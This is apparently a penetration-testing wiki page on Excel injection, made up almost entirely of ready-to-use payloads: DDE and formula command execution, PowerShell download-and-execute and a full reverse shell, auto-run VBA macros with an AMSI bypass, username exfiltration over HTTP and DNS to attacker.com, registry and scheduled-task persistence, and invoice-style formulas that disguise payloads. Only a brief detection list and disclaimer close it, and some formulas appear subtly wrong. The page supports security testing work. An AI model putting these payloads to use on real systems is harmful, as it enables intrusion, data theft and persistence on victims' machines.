Excel Injection

Comprehensive collection of Excel injection techniques, payloads, and attack vectors for security testing and penetration testing.

📋 Overview

Excel injection encompasses various attack vectors that leverage Excel features to execute arbitrary code, exfiltrate data, or perform malicious actions when users open or interact with Excel files.

🎯 Summary

🎯 Quick Start

New to Excel Injection? Start here:

Theory & Basics → Understand fundamental concepts
Step-by-Step Examples → Practical hands-on learning
Testing Lab Setup → Create safe practice environment
Payload Generator → Generate custom payloads

Experienced User? Jump to:

Advanced Techniques → Power Query & M code attacks
Payload Library → 200+ ready payloads
Lab Configuration → Professional testing setup

🚀 Basic Formula Injection

Formula Triggers

Excel formulas can be triggered with these characters:

=   Equals
+   Plus
-   Minus
@   At sign (Excel 2016+)

Basic Command Execution

Windows Command Execution

=cmd|'/C calc.exe'!A1
=cmd|'/C powershell -Command "Start-Process calc"'!A1
=HYPERLINK("cmd|'/C calc.exe'!A1","Click me")

PowerShell Download and Execute

=cmd|'/C powershell IEX(New-Object Net.WebClient).DownloadString("http://attacker.com/payload.ps1")'!A1
=cmd|'/C powershell -W hidden -Command "&([scriptblock]::Create((New-Object Net.WebClient).DownloadString(\"http://attacker.com/payload.ps1\"))).Invoke()"'!A1

Reverse Shell

=cmd|'/C powershell -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.100\",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"'!A1

🔥 Dynamic Data Exchange (DDE) Attacks

Basic DDE Payloads

DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
=2+5+cmd|' /C calc'!A0
=cmd|' /C calc'!'A1'

Advanced DDE Attacks

=cmd|'/C powershell -Command "IEX (New-Object Net.WebClient).DownloadString(\"http://attacker.com/dde.ps1\")"'!A0
=cmd|'/C rundll32.exe url.dll,OpenURL calc.exe'!A0
=cmd|'/C mshta.exe http://attacker.com/payload.hta'!A0

DDE Obfuscation

=AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
=cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A
=         cmd|'/c calc.exe'!A
=SUBSTITUTE(SUBSTITUTE("=cmd|'/c calc'!A1","=",""),"'","")

📝 Excel Macro Injection

VBA Macro Payloads

Auto-Execute on Open

Private Sub Workbook_Open()
    Shell "cmd.exe /c calc.exe", vbHide
End Sub

Private Sub Document_Open()
    CreateObject("WScript.Shell").Run "powershell.exe -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"
End Sub

Advanced Macro with AMSI Bypass

Private Sub Workbook_Open()
    On Error Resume Next

    ' AMSI Bypass
    Dim amsiPtr As LongPtr
    amsiPtr = GetProcAddress(LoadLibraryA("amsi.dll"), "AmsiScanBuffer")

    If amsiPtr <> 0 Then
        Dim patch As String
        patch = "B8" & String(16, "00") & "C3"
        Call WriteProcessMemory(GetCurrentProcess(), amsiPtr, StrPtr(patch), Len(patch), 0)
    End If

    ' Execute payload
    Dim ps As Object
    Set ps = CreateObject("WScript.Shell")
    ps.Run "powershell.exe -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/amsi-bypass.ps1')", 0
End Sub

XLM Macro (Excel 4.0)

=ALERT("This workbook contains macros",3)
=EXEC("cmd.exe /c calc.exe")
=CALL("Kernel32","WinExec","JJCC","calc.exe",0)
=HALT()

🛡️ Evasion Techniques

Character Obfuscation

=CHARGE(67,68,109,100,124,39,47,67,32,99,97,108,99,39,33,65,49)
=CONCATENATE("c","m","d","|","'","/","C"," ","c","a","l","c","'","!","A","1")
=SUBSTITUTE(SUBSTITUTE("=cmd|'/C calc'!A1","=",""),"'","")

Function-Based Obfuscation

=INDIRECT("cmd|'/C calc'!A1")
=EVALUATE("cmd|'/C calc'!A1")
=FORMULATEXT("=cmd|'/C calc'!A1")

Encoding Techniques

=cmd|'/C echo Y21kIC9DIGFkZCB1c2VyIGhhY2tlciAvYWRkICJhZG1pbiI= | base64 /d | cmd'!A1
=cmd|'/C powershell -Command "$text = \"Y21kIC9DIGFscHJvZHVjdCBjYWxj\"; $bytes = [Convert]::FromBase64String($text); [System.Text.Encoding]::ASCII.GetString($bytes) | iex"'!A1

🌐 Network-Based Attacks

HTTP Request Payloads

=cmd|'/C curl http://attacker.com/excel-injection?data=%USERNAME%'!A1
=cmd|'/C powershell -Command "Invoke-WebRequest -Uri http://attacker.com/collect -Method POST -Body @{data=$env:USERNAME}"'!A1
=WEBSERVICE("http://attacker.com/excel-injection?data="&A1)

DNS Exfiltration

=cmd|'/C nslookup %USERNAME%.attacker.com'!A1
=cmd|'/C powershell -Command "nslookup \"$env:USERNAME.$env:COMPUTERNAME.attacker.com\""'!A1

📱 Platform-Specific Attacks

Windows-Specific

=cmd|'/C reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v \"Payload\" /t REG_SZ /d \"cmd.exe /c calc.exe\"'!A1
=cmd|'/C schtasks /create /tn \"ExcelPayload\" /tr \"calc.exe\" /sc onlogon'!A1
=cmd|'/C powershell -Command \"Register-ScheduledTask -TaskName ExcelPayload -Action (New-ScheduledTaskAction -Execute calc.exe) -Trigger (New-ScheduledTaskTrigger -AtLogon)\"'!A1

macOS-Specific (Excel for Mac)

=APPLESCRIPT("do shell script \"osascript -e 'tell application \"System Events\" to keystroke \"calc\" using command down'")
=APPLESCRIPT("do shell script \"curl http://attacker.com/mac-payload.sh | bash\"")

Malicious Hyperlinks

=HYPERLINK("cmd|'/C calc.exe'!A1","Click here for important information")
=HYPERLINK("http://attacker.com/phishing.html","Login to your account")
=HYPERLINK("javascript:alert('XSS')","Click me")

Deceptive Formulas

="Total: $1000 "&cmd|'/C calc.exe'!A1
="Invoice ID: INV-2024-"&cmd|'/C powershell IEX(New-Object Net.WebClient).DownloadString(\"http://attacker.com/payload.ps1\")'!A1

🔍 Detection and Prevention

Detection Signs

Unexpected formula execution
DDE warnings from Excel
Suspicious macro content
Network connections from Excel processes
Unusual child processes from Excel

Prevention Measures

Enable Protected View in Excel
Disable Macros by default
Block DDE functionality via Group Policy
Use Application Control to block Excel spawning suspicious processes
Network Monitoring for unusual Excel traffic
File Sandboxing before opening

📚 References

Excel Payload Generator - Comprehensive payload generation tool
Basic Payload Examples - Ready-to-use injection payloads
Step-by-Step Examples - 8 complete practical scenarios
Testing Lab Setup - Complete virtual lab configuration

⚠️ This documentation is for educational purposes and authorized security testing only. Always obtain proper authorization before testing.

Last updated 5 months ago

hashtag📋 Overview

hashtag🎯 Summary

hashtag🎯 Quick Start

hashtag🚀 Basic Formula Injection

hashtagFormula Triggers

hashtagBasic Command Execution

hashtagWindows Command Execution

hashtagPowerShell Download and Execute

hashtagReverse Shell

hashtag🔥 Dynamic Data Exchange (DDE) Attacks

hashtagBasic DDE Payloads

hashtagAdvanced DDE Attacks

hashtagDDE Obfuscation

hashtag📝 Excel Macro Injection

hashtagVBA Macro Payloads

hashtagAuto-Execute on Open

hashtagAdvanced Macro with AMSI Bypass

hashtagXLM Macro (Excel 4.0)

hashtag🛡️ Evasion Techniques

hashtagCharacter Obfuscation

hashtagFunction-Based Obfuscation

hashtagEncoding Techniques

hashtag🌐 Network-Based Attacks

hashtagHTTP Request Payloads

hashtagDNS Exfiltration

hashtag📱 Platform-Specific Attacks

hashtagWindows-Specific

hashtagmacOS-Specific (Excel for Mac)

hashtag🎨 Social Engineering Attacks

hashtagMalicious Hyperlinks

hashtagDeceptive Formulas

hashtag🔍 Detection and Prevention

hashtagDetection Signs

hashtagPrevention Measures

hashtag📚 References

hashtag🛠️ Related Tools